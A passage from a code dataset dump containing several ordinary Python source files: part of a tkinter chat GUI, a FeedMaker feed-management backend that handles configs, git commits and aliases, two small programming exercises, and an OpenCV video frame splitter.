font=(\"arial\",16)).pack()\r\n\r\n\r\n box.pack()\r\n notification_frame.place(x=300,y=150)\r\n infotab.place(x=10,y=250)\r\n\r\n\r\n\r\nclass ThirdPage(Frame):\r\n def __init__(self, parent, controller):\r\n Frame.__init__(self,parent,bg=\"#333\")\r\n\r\n \r\n\r\n #xi= 0\r\n #yi= 0\r\n\r\n #def show_message():\r\n\r\n #u = user_entry.get()\r\n #user = Label(chat_bg,height=1,width=55,bg=\"#a6a6a6\",text= u,font=12,anchor=\"e\")\r\n #user.place(x=xi,y=yi)\r\n\r\n #if 'hello' in u:\r\n #other_user = Label(chat_bg, height=1, width=55, bg=\"#a6a6a6\", text=\"almost there\", font=12, anchor=\"w\")\r\n #other_user.place(x=xi, y=yi+25)\r\n\r\n\r\n\r\n entry_bg = Frame(self,height=50,width=500,bg=\"white\")\r\n entry_bg.place(x=299,y=448)\r\n\r\n other_info_bg = Frame(self, height=50, width=299, bg=\"green\")\r\n other_info_bg.place(x=0, y=0)\r\n\r\n global chat_bg_img\r\n chat_bg_img = ImageTk.PhotoImage(Image.open(\"pictures/original whatsapp.png\").resize((500,390)))\r\n chat_bg = Listbox(self,height=20,width=500)\r\n chat_bg.place(x=299,y=51)\r\n chat_label = Label(chat_bg,image=chat_bg_img)\r\n chat_label.pack()\r\n\r\n\r\n\r\n\r\n\r\n info_bg = Frame(self, height=50, width=500, bg=\"white\")\r\n info_bg.place(x=299, y=0)\r\n\r\n user_entry = Entry(entry_bg,width=28,font=(\"helvetica\",20))\r\n user_entry.place(x=0,y=10)\r\n\r\n\r\n\r\n\r\n #l4= Label(self,text=\"jkaf\").pack(side='left'),Label(self,text=\"mibd\").pack(side=\"left\")\r\n # img = ImageTk.PhotoImage(Image.open(\"C:/Users/mylo/Desktop/rcs project/pictures/1000011412.jpg\"))\r\n # b1=Button(self,image=(img)).pack()\r\n ljd= Button(self,text=\"send\").place(x=750,y=470)\r\n\r\n\r\n imgg = ImageTk.PhotoImage(Image.open(\"pictures/arrow-left.png\").resize((30, 30)))\r\n back_button = CTkButton(self,image=imgg, text=\"\",width=10,fg_color=\"#fff\",command=lambda:controller.show_frame(SecondPage)).grid()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass Application(Tk):\r\n def __init__(self,*args,**kwargs):\r\n Tk.__init__(self,*args,**kwargs)\r\n #creating window\r\n window = Frame(self)\r\n window.pack()\r\n\r\n window.grid_rowconfigure(0, minsize=500)\r\n window.grid_columnconfigure(0,minsize=800)\r\n\r\n self.frames ={}\r\n for F in(FisrtPage,SecondPage,ThirdPage,AdminPage):\r\n frame = F(window, self)\r\n self.frames[F] = frame\r\n frame.grid(row=0,column=0,sticky=\"nsew\")\r\n\r\n self.show_frame(FisrtPage)\r\n\r\n def show_frame(self, page):\r\n frame = self.frames[page]\r\n frame.tkraise()\r\n\r\n\r\napp = 
Application()\r\napp.mainloop()\r\n\r\n","repo_name":"Mylomj/scs","sub_path":"newnewstartpage.py","file_name":"newnewstartpage.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44232066672","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\nimport os\r\nfrom pathlib import Path\r\nimport json\r\nimport re\r\nimport logging\r\nimport logging.config\r\nfrom datetime import datetime\r\nfrom shutil import rmtree\r\nfrom typing import List, Dict, Any, Tuple, Optional\r\nfrom functools import cmp_to_key\r\nfrom bin.run import FeedMakerRunner\r\nfrom bin.feed_maker_util import Htaccess, Process, Data, PathUtil\r\nfrom bin.problem_manager import ProblemManager\r\nfrom utils.search_manga_site import SearchManager\r\n\r\nlogging.config.fileConfig(Path(__file__).parent.parent / \"logging.conf\")\r\nLOGGER = logging.getLogger(__name__)\r\n\r\n\r\nclass FeedManager:\r\n work_dir = Path(os.environ[\"FEED_MAKER_WORK_DIR\"])\r\n public_feed_dir = Path(os.environ[\"FEED_MAKER_WWW_FEEDS_DIR\"])\r\n CONF_FILE = \"conf.json\"\r\n SITE_CONF_FILE = \"site_config.json\"\r\n\r\n def __init__(self) -> None:\r\n # group_name -> feed_title_list(name, title)\r\n self.group_name_feed_title_list_map: Dict[str, List[Dict[str, str]]] = {}\r\n # feed_name -> configuration\r\n self.feed_name_config_map: Dict[str, Any] = {}\r\n self.problem_manager = ProblemManager()\r\n self.problem_manager.load_all()\r\n\r\n def _git_add(self, feed_dir_path: Path) -> Tuple[str, Optional[str]]:\r\n feed_name = feed_dir_path.name\r\n conf_file_relative = PathUtil.convert_path_to_str(feed_dir_path)\r\n os.chdir(self.work_dir)\r\n cmd = f\"git add {conf_file_relative} && git commit -m 'add {feed_name}'\"\r\n return Process.exec_cmd(cmd, dir_path=self.work_dir)\r\n\r\n def _git_rm(self, feed_dir_path: Path) -> Tuple[str, Optional[str]]:\r\n feed_name = feed_dir_path.name\r\n conf_file_relative = PathUtil.convert_path_to_str(feed_dir_path)\r\n os.chdir(self.work_dir)\r\n cmd = f\"git rm -r {conf_file_relative} && git commit -m 'remove {feed_name}'\"\r\n return Process.exec_cmd(cmd, dir_path=self.work_dir)\r\n\r\n def _git_mv(self, feed_dir_path: Path, new_feed_dir_path: Path) -> Tuple[str, Optional[str]]:\r\n feed_dir_name = feed_dir_path.name\r\n new_feed_dir_name = new_feed_dir_path.name\r\n feed_dir_path_relative = PathUtil.convert_path_to_str(feed_dir_path)\r\n new_feed_dir_path_relative = PathUtil.convert_path_to_str(new_feed_dir_path)\r\n os.chdir(self.work_dir)\r\n cmd = f\"git mv {feed_dir_path_relative} {new_feed_dir_path_relative} && git commit -m 'rename {feed_dir_name} to {new_feed_dir_name}' || mv {feed_dir_path_relative} {new_feed_dir_path_relative}\"\r\n return Process.exec_cmd(cmd, dir_path=self.work_dir)\r\n\r\n def _read_config_file(self, feed_dir_path: Path) -> Dict[str, Any]:\r\n conf_file_path = feed_dir_path / self.CONF_FILE\r\n if conf_file_path.is_file():\r\n with conf_file_path.open('r', encoding='utf-8') as infile:\r\n line_list: List[str] = []\r\n for line in infile:\r\n line_list.append(line)\r\n json_data = json.loads(''.join(line_list))\r\n if \"configuration\" not in json_data:\r\n LOGGER.error(f\"can't find normal configuration '{PathUtil.convert_path_to_str(feed_dir_path)}'\")\r\n return {}\r\n return json_data[\"configuration\"]\r\n return {}\r\n\r\n @staticmethod\r\n def _get_title_from_configuration(configuration: Dict[str, Any], feed_name: str) -> str:\r\n if configuration and \"rss\" in 
configuration and \"title\" in configuration[\"rss\"]:\r\n title = configuration[\"rss\"][\"title\"].split(\"::\")[0]\r\n else:\r\n title = feed_name\r\n return title\r\n\r\n def _scan_feeds_by_group(self, group_name: str) -> None:\r\n group_dir_path = self.work_dir / group_name\r\n feed_title_list: List[Dict[str, str]] = []\r\n for path in group_dir_path.iterdir():\r\n if path.is_dir():\r\n feed_name = path.name\r\n if feed_name.startswith(\".\"):\r\n continue\r\n configuration = self._read_config_file(path)\r\n self.feed_name_config_map[feed_name] = configuration\r\n title = self._get_title_from_configuration(configuration, feed_name)\r\n feed_title_list.append({\"name\": feed_name, \"title\": title})\r\n elif path.name == self.SITE_CONF_FILE:\r\n feed_title_list.append({\"name\": path.name, \"title\": path.name})\r\n self.group_name_feed_title_list_map[group_name] = feed_title_list\r\n\r\n def scan_all_feeds(self) -> None:\r\n LOGGER.debug(\"# scan_all_feeds()\")\r\n self.feed_name_config_map.clear()\r\n self.group_name_feed_title_list_map.clear()\r\n for group_dir_path in self.work_dir.iterdir():\r\n if group_dir_path.is_dir():\r\n group_name = group_dir_path.name\r\n if group_name in (\"test\", \"logs\") or group_name.startswith(\".\"):\r\n continue\r\n self._scan_feeds_by_group(group_name)\r\n\r\n async def get_exec_result(self) -> Tuple[str, str]:\r\n LOGGER.debug(\"# get_exec_result()\")\r\n exec_result_file_path = self.work_dir / \"logs\" / \"all.log\"\r\n if exec_result_file_path.is_file():\r\n with exec_result_file_path.open('r', encoding='utf-8') as infile:\r\n return infile.read(), \"\"\r\n else:\r\n return \"\", f\"can't find such file '{PathUtil.convert_path_to_str(exec_result_file_path)}'\"\r\n\r\n async def get_problems_status_info(self) -> Tuple[Dict[str, Dict[str, Any]], str]:\r\n LOGGER.debug(\"# get_problems_status_info()\")\r\n feed_alias_status_info = self.problem_manager.get_feed_alias_status_info_map()\r\n return feed_alias_status_info, \"\"\r\n\r\n async def get_problems_progress_info(self) -> Tuple[Dict[str, Dict[str, Any]], str]:\r\n LOGGER.debug(\"# get_problems_progress_info()\")\r\n return self.problem_manager.get_feed_name_progress_info_map(), \"\"\r\n\r\n async def get_problems_public_feed_info(self) -> Tuple[Dict[str, Dict[str, Any]], str]:\r\n LOGGER.debug(\"# get_problems_public_feed_info()\")\r\n return self.problem_manager.get_feed_name_public_feed_info_map(), \"\"\r\n\r\n async def get_problems_html_info(self) -> Tuple[Dict[str, Any], str]:\r\n LOGGER.debug(\"# get_problems_html_info()\")\r\n return {\"html_file_size_map\": self.problem_manager.get_html_file_size_map(), \"html_file_with_many_image_tag_map\": self.problem_manager.get_html_file_with_many_image_tag_map(), \"html_file_without_image_tag_map\": self.problem_manager.get_html_file_without_image_tag_map(), \"html_file_image_not_found_map\": self.problem_manager.get_html_file_image_not_found_map()}, \"\"\r\n\r\n async def get_problems_element_info(self) -> Tuple[Dict[str, Any], str]:\r\n LOGGER.debug(\"# get_problems_element_info()\")\r\n return {\"feed_name_list_url_count_map\": self.problem_manager.get_feed_name_list_url_count_map(), \"element_name_count_map\": self.problem_manager.get_element_name_count_map()}, \"\"\r\n\r\n @staticmethod\r\n def _determine_keyword_in_config_item(keyword: str, config: Dict[str, Any], *args):\r\n config_item: Dict[str, Any] = config\r\n for arg in args:\r\n if arg in config_item:\r\n config_item = config_item[arg]\r\n return keyword in config_item\r\n\r\n 
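# Search helper chain: a feed matches only when every keyword appears in its name, its title, or its description.\r\n 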
async def search(self, keywords: str) -> Tuple[List[Dict[str, Any]], str]:\r\n LOGGER.debug(f\"# search(keywords={keywords})\")\r\n result_list: List[Dict[str, Any]] = []\r\n keyword_list = keywords.split(' ')\r\n for feed_name, config in self.feed_name_config_map.items():\r\n match_count_in_name = 0\r\n match_count_in_title = 0\r\n match_count_in_description = 0\r\n for keyword in keyword_list:\r\n if keyword in feed_name:\r\n match_count_in_name += 1\r\n if self._determine_keyword_in_config_item(keyword, config, \"rss\", \"title\"):\r\n match_count_in_title += 1\r\n if self._determine_keyword_in_config_item(keyword, config, \"rss\", \"description\"):\r\n match_count_in_description += 1\r\n\r\n if match_count_in_name == len(keyword_list) or match_count_in_title == len(keyword_list) or match_count_in_description == len(keyword_list):\r\n group_name = self.problem_manager.feed_name_group_map.get(feed_name, \"\")\r\n title = self.problem_manager.feed_name_title_map.get(feed_name, \"\")\r\n result_list.append({'group_name': group_name, 'feed_name': feed_name, 'feed_title': title})\r\n\r\n return result_list, \"\"\r\n\r\n @staticmethod\r\n def search_site(keyword: str) -> Tuple[List[Tuple[str, str]], str]:\r\n LOGGER.debug(f\"# search_site(keyword={keyword})\")\r\n search_manager = SearchManager()\r\n return search_manager.search(\"\", keyword), \"\"\r\n\r\n @staticmethod\r\n def _compare_names(x, y):\r\n if x['name'][0] == \"_\" and y['name'][0] != \"_\":\r\n return 1\r\n if x['name'][0] != \"_\" and y['name'][0] == \"_\":\r\n return -1\r\n if x['name'] < y['name']:\r\n return -1\r\n if x['name'] > y['name']:\r\n return 1\r\n return 0\r\n\r\n async def get_groups(self) -> Tuple[List[Dict[str, Any]], str]:\r\n LOGGER.debug(\"# get_groups()\")\r\n group_list: List[Dict[str, Any]] = []\r\n if self.group_name_feed_title_list_map:\r\n for group_name, feed_title_list in self.group_name_feed_title_list_map.items():\r\n group_list.append({\"name\": group_name, \"num_feeds\": len(feed_title_list)})\r\n return sorted(group_list, key=cmp_to_key(FeedManager._compare_names)), \"\"\r\n return [], \"no group list\"\r\n\r\n @staticmethod\r\n def _compare_title(x, y):\r\n if x[\"name\"][0] == \"_\" and y[\"name\"][0] != \"_\":\r\n return 1\r\n if x[\"name\"][0] != \"_\" and y[\"name\"][0] == \"_\":\r\n return -1\r\n if x[\"title\"][0] == \"_\" and y[\"title\"][0] != \"_\":\r\n return 1\r\n if x[\"title\"][0] != \"_\" and y[\"title\"][0] == \"_\":\r\n return -1\r\n if x[\"title\"] < y[\"title\"]:\r\n return -1\r\n if x[\"title\"] > y[\"title\"]:\r\n return 1\r\n return 0\r\n\r\n async def get_site_config(self, group_name: str) -> Tuple[Dict[str, str], str]:\r\n LOGGER.debug(f\"# get_site_config({group_name})\")\r\n path = self.work_dir / group_name / self.SITE_CONF_FILE\r\n if path.is_file():\r\n with path.open('r', encoding='utf-8') as infile:\r\n json_data = json.load(infile)\r\n return json_data, \"\"\r\n return {}, f\"no feed list in group '{group_name}'\"\r\n\r\n async def save_site_config(self, group_name: str, post_data: Dict[str, Any]) -> Tuple[bool, str]:\r\n LOGGER.debug(f\"# save_site_config({group_name}, {post_data})\")\r\n path = self.work_dir / group_name / self.SITE_CONF_FILE\r\n try:\r\n with path.open('w', encoding='utf-8') as outfile:\r\n outfile.write(json.dumps(post_data, indent=2, ensure_ascii=False))\r\n except IOError as e:\r\n return False, str(e)\r\n return True, \"\"\r\n\r\n async def get_feeds_by_group(self, group_name: str) -> Tuple[List[Dict[str, str]], str]:\r\n LOGGER.debug(f\"# 
get_feeds_by_group({group_name})\")\r\n if group_name in self.group_name_feed_title_list_map:\r\n feed_title_list = self.group_name_feed_title_list_map[group_name]\r\n return sorted(feed_title_list, key=cmp_to_key(FeedManager._compare_title)), \"\"\r\n return [], f\"no feed list in group '{group_name}'\"\r\n\r\n async def get_feed_info_by_name(self, group_name: str, feed_name: str) -> Tuple[Dict[str, Any], str]:\r\n LOGGER.debug(f\"# get_feed_info_by_name({feed_name})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n list_dir_path = feed_dir_path / \"newlist\"\r\n last_collect_date = None\r\n result_list = []\r\n collection_info = {}\r\n if list_dir_path.is_dir():\r\n for list_file_path in list_dir_path.iterdir():\r\n m = re.search(r'(2\\d{3}\\d{2}\\d{2})\\.txt', list_file_path.name)\r\n if not m:\r\n continue\r\n st = list_file_path.stat()\r\n if not last_collect_date:\r\n last_collect_date = datetime.fromtimestamp(st.st_mtime)\r\n else:\r\n if last_collect_date < datetime.fromtimestamp(st.st_mtime):\r\n last_collect_date = datetime.fromtimestamp(st.st_mtime)\r\n with list_file_path.open('r', encoding='utf-8') as infile:\r\n for line in infile:\r\n link, _ = line.split(\"\\t\")\r\n result_list.append(link)\r\n result_list = Data.remove_duplicates(result_list)\r\n collection_info = {\"collect_date\": ProblemManager.convert_datetime_to_str(last_collect_date), \"count\": len(result_list)}\r\n feed_info = {\r\n \"config\": self.feed_name_config_map.get(feed_name, {}),\r\n \"collection_info\": collection_info,\r\n \"public_feed_info\": self.problem_manager.get_feed_name_public_feed_info_map().get(feed_name, {}),\r\n \"progress_info\": self.problem_manager.get_feed_name_progress_info_map().get(feed_name, {}),\r\n }\r\n return feed_info, \"\"\r\n\r\n async def save_config_file(self, group_name: str, feed_name: str, post_data: Dict[str, Any]) -> Tuple[bool, str]:\r\n LOGGER.debug(f\"# save_config_file({group_name}, {feed_name}, {post_data})\")\r\n if \"configuration\" not in post_data:\r\n return False, \"invalid configuration format (no 'configuration')\"\r\n\r\n configuration = post_data[\"configuration\"]\r\n if not (\"collection\" in configuration and \"extraction\" in configuration and \"rss\" in configuration):\r\n return False, \"invalid configuration format (no 'collection' or 'extraction' or 'rss')\"\r\n\r\n config_file_path = self.work_dir / group_name / feed_name / self.CONF_FILE\r\n config_file_path.parent.mkdir(exist_ok=True)\r\n with config_file_path.open('w', encoding='utf-8') as outfile:\r\n outfile.write(json.dumps(post_data, indent=2, ensure_ascii=False))\r\n\r\n self._git_add(config_file_path)\r\n\r\n # re-scan feeds by group\r\n self.scan_all_feeds()\r\n self.problem_manager.add_config_rss_info(config_file_path.parent)\r\n return True, \"\"\r\n\r\n def run(self, group_name: str, feed_name: str, alias: str) -> Tuple[bool, str]:\r\n LOGGER.debug(f\"# run({group_name}, {feed_name}, {alias})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n conf_file_path = feed_dir_path / self.CONF_FILE\r\n with conf_file_path.open('rb') as infile:\r\n json_data = json.load(infile)\r\n if \"configuration\" in json_data:\r\n runner = FeedMakerRunner(html_archiving_period=30, list_archiving_period=7)\r\n if json_data[\"configuration\"][\"collection\"].get(\"is_completed\", False):\r\n result = runner.make_single_feed(\r\n feed_dir_path, options={\"force_collection_opt\": \"-c\"})\r\n if not result:\r\n return False, \"error in making a feed with all completed 
articles\"\r\n\r\n result = runner.make_single_feed(feed_dir_path, options={})\r\n if not result:\r\n return False, \"error in making a feed with recent articles\"\r\n\r\n _, error = Htaccess.get_alias(group_name, feed_name)\r\n if error:\r\n if not alias:\r\n alias = feed_name\r\n _, error = Htaccess.set_alias(group_name, feed_name, alias)\r\n if error:\r\n return False, \"error in setting alias to .htaccess\"\r\n else:\r\n return False, \"invalid format of configuration file\"\r\n\r\n self.problem_manager.update_feed_info(feed_dir_path)\r\n return True, \"\"\r\n\r\n def _remove_public_img_pdf_feed_files(self, feed_name: str) -> None:\r\n LOGGER.debug(f\"# _remove_public_img_pdf_feed_files({feed_name})\")\r\n img_dir_path = self.public_feed_dir / \"img\" / feed_name\r\n pdf_dir_path = self.public_feed_dir / \"pdf\" / feed_name\r\n feed_file_path = self.public_feed_dir / f\"{feed_name}.xml\"\r\n\r\n # remove files\r\n if img_dir_path.is_dir():\r\n LOGGER.debug(f\"deleting {img_dir_path}\")\r\n rmtree(img_dir_path)\r\n if pdf_dir_path.is_dir():\r\n LOGGER.debug(f\"deleting {pdf_dir_path}\")\r\n rmtree(pdf_dir_path)\r\n LOGGER.debug(f\"deleting {feed_file_path}\")\r\n feed_file_path.unlink(missing_ok=True)\r\n\r\n async def remove_list(self, group_name: str, feed_name: str) -> None:\r\n LOGGER.debug(f\"# remove_list({group_name}, {feed_name})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n list_dir_path = feed_dir_path / \"newlist\"\r\n if list_dir_path.is_dir():\r\n rmtree(list_dir_path)\r\n\r\n async def remove_html(self, group_name: str, feed_name: str) -> None:\r\n LOGGER.debug(f\"# remove_html({group_name}, {feed_name})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n html_dir_path = feed_dir_path / \"html\"\r\n if html_dir_path.is_dir():\r\n rmtree(html_dir_path)\r\n self.problem_manager.remove_html_file_in_path_from_info(\"feed_dir_path\", feed_dir_path)\r\n\r\n async def remove_html_file(self, group_name: str, feed_name: str, html_file_name: str) -> None:\r\n LOGGER.debug(f\"# remove_html_file({group_name}, {feed_name})\")\r\n html_file_path = self.work_dir / group_name / feed_name / \"html\" / html_file_name\r\n html_file_path.unlink(missing_ok=True)\r\n self.problem_manager.remove_html_file_in_path_from_info(\"file_path\", html_file_path)\r\n\r\n async def remove_public_feed(self, feed_name: str) -> None:\r\n LOGGER.debug(f\"# remove_public_feed({feed_name})\")\r\n feed_file_path = self.public_feed_dir / f\"{feed_name}.xml\"\r\n feed_file_path.unlink(missing_ok=True)\r\n self.problem_manager.remove_public_feed_info(feed_file_path)\r\n\r\n async def remove_feed(self, group_name: str, feed_name: str) -> Tuple[bool, str]:\r\n LOGGER.debug(f\"# remove_feed({group_name}, {feed_name})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n conf_file_path = feed_dir_path / self.CONF_FILE\r\n if not feed_dir_path or not conf_file_path:\r\n return False, f\"can't remove feed '{PathUtil.convert_path_to_str(feed_dir_path)}'\"\r\n\r\n # remove files\r\n self._remove_public_img_pdf_feed_files(feed_name)\r\n\r\n # git rm & commit\r\n self._git_rm(feed_dir_path)\r\n\r\n # remove remainder files and directories\r\n if feed_dir_path.is_dir():\r\n rmtree(feed_dir_path)\r\n\r\n # remove alias\r\n result, _ = Htaccess.remove_alias(group_name, feed_name)\r\n if not result:\r\n return False, \"error in removing alias from .htaccess\"\r\n\r\n # re-scan feeds by group\r\n self.scan_all_feeds()\r\n self.problem_manager.update_feed_info(feed_dir_path)\r\n return 
True, \"\"\r\n\r\n    async def remove_group(self, group_name: str) -> Tuple[bool, str]:\r\n        LOGGER.debug(f\"# remove_group({group_name})\")\r\n        group_dir_path = self.work_dir / group_name\r\n        if not group_dir_path.is_dir():\r\n            return False, f\"can't remove group '{group_name}'\"\r\n\r\n        # snapshot the feed directories first; the group directory itself is deleted below\r\n        feed_dir_path_list = list(group_dir_path.iterdir())\r\n\r\n        # remove files\r\n        for feed_dir_path in feed_dir_path_list:\r\n            feed_name = feed_dir_path.name\r\n            self._remove_public_img_pdf_feed_files(feed_name)\r\n\r\n        # git rm & commit\r\n        self._git_rm(group_dir_path)\r\n\r\n        # remove remainder files and directories\r\n        if group_dir_path.is_dir():\r\n            rmtree(group_dir_path)\r\n\r\n        # re-scan feeds by group\r\n        self.scan_all_feeds()\r\n        for feed_dir_path in feed_dir_path_list:\r\n            self.problem_manager.remove_htaccess_info(feed_dir_path.name)\r\n            self.problem_manager.remove_config_rss_info(feed_dir_path)\r\n            feed_file_path = self.public_feed_dir / f\"{feed_dir_path.name}.xml\"\r\n            self.problem_manager.remove_public_feed_info(feed_file_path)\r\n            self.problem_manager.remove_progress_info(feed_dir_path)\r\n            self.problem_manager.remove_html_file_in_path_from_info(\"feed_dir_path\", feed_dir_path)\r\n        self.problem_manager.load_all_httpd_access_files()\r\n        return True, \"\"\r\n\r\n    async def toggle_feed(self, group_name: str, feed_name: str) -> Tuple[str, str]:\r\n        LOGGER.debug(f\"# toggle_feed({group_name}, {feed_name})\")\r\n        if feed_name.startswith(\"_\"):\r\n            new_feed_name = feed_name[1:]\r\n        else:\r\n            new_feed_name = \"_\" + feed_name\r\n\r\n        # rename feed directory\r\n        feed_dir_path = self.work_dir / group_name / feed_name\r\n        new_feed_dir_path = self.work_dir / group_name / new_feed_name\r\n        if not feed_dir_path.is_dir():\r\n            return \"\", f\"can't find such a directory '{PathUtil.convert_path_to_str(feed_dir_path)}'\"\r\n        # git mv & commit\r\n        self._git_mv(feed_dir_path, new_feed_dir_path)\r\n\r\n        # re-scan feeds by group\r\n        self._scan_feeds_by_group(group_name)\r\n\r\n        self.problem_manager.update_feed_info(feed_dir_path)\r\n        return new_feed_name, \"\"\r\n\r\n    async def toggle_group(self, group_name: str) -> Tuple[str, str]:\r\n        LOGGER.debug(f\"# toggle_group({group_name})\")\r\n        if group_name.startswith(\"_\"):\r\n            new_group_name = group_name[1:]\r\n        else:\r\n            new_group_name = \"_\" + group_name\r\n\r\n        # rename feed directory\r\n        group_dir_path = self.work_dir / group_name\r\n        new_group_dir_path = self.work_dir / new_group_name\r\n        if not group_dir_path.is_dir():\r\n            return \"\", f\"can't find such a directory '{PathUtil.convert_path_to_str(group_dir_path)}'\"\r\n        # snapshot before the git mv renames the directory on disk\r\n        feed_dir_path_list = list(group_dir_path.iterdir())\r\n        # git mv & commit\r\n        self._git_mv(group_dir_path, new_group_dir_path)\r\n\r\n        # re-scan feeds by group\r\n        self.scan_all_feeds()\r\n        if group_name.startswith(\"_\"):\r\n            # enable\r\n            for feed_dir_path in new_group_dir_path.iterdir():\r\n                self.problem_manager.add_htaccess_info(feed_dir_path.name)\r\n                self.problem_manager.add_config_rss_info(feed_dir_path)\r\n                feed_file_path = self.public_feed_dir / f\"{feed_dir_path.name}.xml\"\r\n                self.problem_manager.add_public_feed_info(feed_file_path)\r\n                self.problem_manager.add_progress_info(feed_dir_path)\r\n                self.problem_manager.add_html_info(feed_dir_path)\r\n        else:\r\n            # disable\r\n            for feed_dir_path in feed_dir_path_list:\r\n                self.problem_manager.remove_htaccess_info(feed_dir_path.name)\r\n                self.problem_manager.remove_config_rss_info(feed_dir_path)\r\n                feed_file_path = self.public_feed_dir / f\"{feed_dir_path.name}.xml\"\r\n                self.problem_manager.remove_public_feed_info(feed_file_path)\r\n                self.problem_manager.remove_progress_info(feed_dir_path)\r\n            
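# the last per-feed cleanup step when a group is disabled: drop its cached HTML-file info\r\n            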
self.problem_manager.remove_html_file_in_path_from_info(\"feed_dir_path\", feed_dir_path)\r\n        self.problem_manager.load_all_httpd_access_files()\r\n        return new_group_name, \"\"\r\n\r\n    @staticmethod\r\n    async def get_alias(group_name: str, feed_name: str):\r\n        LOGGER.debug(f\"# get_alias({group_name}, {feed_name})\")\r\n        result, error = Htaccess.get_alias(group_name, feed_name)\r\n        if not result:\r\n            return \"\", error\r\n        return result, \"\"\r\n\r\n    async def remove_alias(self, group_name: str, feed_name: str):\r\n        LOGGER.debug(f\"# remove_alias({group_name}, {feed_name})\")\r\n        result, error = Htaccess.remove_alias(group_name, feed_name)\r\n        if not result:\r\n            return False, error\r\n        self.problem_manager.remove_htaccess_info(feed_name)\r\n        return True, \"\"\r\n\r\n    async def rename_alias(self, group_name: str, feed_name: str, new_alias: str):\r\n        LOGGER.debug(f\"# rename_alias({group_name}, {feed_name}, {new_alias})\")\r\n        result, error = Htaccess.set_alias(group_name, feed_name, new_alias)\r\n        if not result:\r\n            return False, error\r\n        if new_alias in self.problem_manager.feed_alias_name_map:\r\n            old_feed_name = self.problem_manager.feed_alias_name_map[new_alias]\r\n            self.problem_manager.remove_htaccess_info(old_feed_name)\r\n        self.problem_manager.add_htaccess_info(feed_name)\r\n        return True, \"\"\r\n\r\n    @staticmethod\r\n    async def check_running(group_name: str, feed_name: str) -> bool:\r\n        # LOGGER.debug(f\"# check_running({group_name}, {feed_name})\")\r\n        return FeedMakerRunner.check_running(group_name, feed_name)\r\n","repo_name":"terzeron/FeedMaker","sub_path":"backend/feed_manager.py","file_name":"feed_manager.py","file_ext":"py","file_size_in_byte":25008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"15114234160","text":"while True:\r\n    valores = [int(x) for x in input().split()]\r\n    m = min(valores)\r\n    n = max(valores)\r\n\r\n    if m <= 0:\r\n        break\r\n\r\n    soma = 0\r\n    for i in range(m, n + 1):\r\n        print(i, end=\" \")\r\n        soma += i\r\n    print(f\"Sum={soma}\")\r\n","repo_name":"GersonRS/beecrowd","sub_path":"Iniciante/python-solution/1101-sequencia-de-numeros-e-soma/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"}
{"seq_id":"19029776699","text":"# Task No. 21. 
Solution in groups.\n# Write a program that prints all the unique values in a dictionary.\n# Input: [{\"V\": \"S001\"}, {\"V\": \"S002\"}, {\"VI\": \"S001\"}, {\"VI\": \"S005\"},\n# {\"VII\": \" S005 \"}, {\" V \":\" S009 \"}, {\" VIII\":\" S007 \"}]\n# Output: {'S005', 'S002', 'S007', 'S001', 'S009'}\n# Note: the list of dictionaries is given up front; the user does not enter it.\n# ------------------------------------------------------\n\ndictionary = [{\"V\": \"S001\"}, {\"V\": \"S002\"}, {\"VI\": \"S001\"}, {\"VI\": \"S005\"},\n              {\"VII\": \" S005 \"}, {\" V \": \" S009 \"}, {\" VIII\": \" S007 \"}]\ns = set()\n\nfor item in dictionary:\n    for value in item.values():\n        s.add(value.strip())  # Collects the non-repeating dictionary values (with surrounding spaces REMOVED).\n\nprint(*s)\n","repo_name":"kask1n/Py_Introduction","sub_path":"Py_Seminar3_Classwork/Py_Task21/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"11089978086","text":"\"\"\"\n# Credits: https://github.com/msmccor100/Orchid-Pollinator-Detection\n\nThis script splits a video into frames at the specified frame rate, resizes these\nto specified dimensions, and saves these to the specified directory.\n\"\"\"\n\nimport os\nimport cv2\n\ndef split_video(vidpath, output_dir, desired_fps=4, width=640, height=640):\n    vcdata = cv2.VideoCapture(vidpath)\n    num_frames = vcdata.get(cv2.CAP_PROP_FRAME_COUNT)\n    actual_fps = vcdata.get(cv2.CAP_PROP_FPS)\n    if actual_fps == 0:\n        return []\n\n    # calculate duration of the video\n    seconds = num_frames / actual_fps\n    desired_frames = int(seconds * desired_fps)\n    delta = num_frames / desired_frames\n\n    (W, H) = (None, None)\n\n    # Read in all the frames and store in an array\n    frame_num = 0\n    frame_array = [None] * desired_frames\n    next_delta = 0\n    count = 0\n    while True:\n        # read the next frame from the file\n        (grabbed, frame) = vcdata.read()\n        if not grabbed:\n            break\n\n        if W is None or H is None:\n            (H, W) = frame.shape[:2]\n\n        if frame_num >= next_delta:\n            next_delta += delta\n            if H != height or W != width:\n                frame_array[count] = cv2.resize(frame, dsize=(width, height), interpolation=cv2.INTER_AREA)\n            else:\n                frame_array[count] = frame\n            count += 1\n        frame_num += 1\n\n    if not os.path.exists(output_dir):\n        os.mkdir(output_dir)\n\n    [_, vidname] = os.path.split(vidpath)\n    [root_fn, _] = os.path.splitext(vidname)\n    frames = []\n    for count, frame in enumerate(frame_array):\n        filename = root_fn + \"_\" + str(count) + \".jpg\"\n        output_path = os.path.join(output_dir, filename)\n        if frame is not None:\n            cv2.imwrite(output_path, frame)\n            frames.append(output_path)\n    return frames\n","repo_name":"gsrinivas37/pollinator_detection","sub_path":"utils/split_video.py","file_name":"split_video.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
